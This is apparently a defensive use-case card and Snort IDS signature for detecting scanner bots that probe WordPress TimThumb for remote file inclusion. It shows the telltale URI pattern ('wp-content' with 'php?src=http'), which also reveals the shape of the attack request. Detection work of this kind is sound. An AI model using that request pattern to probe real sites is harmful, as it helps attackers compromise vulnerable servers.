- Use Case Reference : SUC029
- Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
- Use Case Detection : IDS / HTTP logs
- Attacker Class : Opportunists
- Attack Sophistication : Unsophisticated
- Identified tool(s) : ByroeNet scanners variant
- Source IP(s) : Random
- Source Countries : Random
- Source Port(s) : Random
- Destination Port(s) : 80/TCP, 443/TCP
Possible(s) correlation(s) :
- Related blog posts “WordPress TimThumb Botnets Spreads Status“, “WordPress TimThumb Botnet Visualization and Status” and “WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector“.
Source(s) :
- Related blog posts “WordPress TimThumb Botnets Spreads Status“, “WordPress TimThumb Botnet Visualization and Status” and “WordPress TimThumb RFI Vulnerability used as Botnet Recruitment Vector“.
ZATAZ SIG 1010050 triggers are :
- URI should contain “wp-content” and “php?src=http“
- The source port could be any FROM EXTERNAL_NET in destination of an HTTP_SERVERS HTTP_PORTS.
- Threshold is configured to count 1 occurrence in 30 seconds for the same IP source.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - posssible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
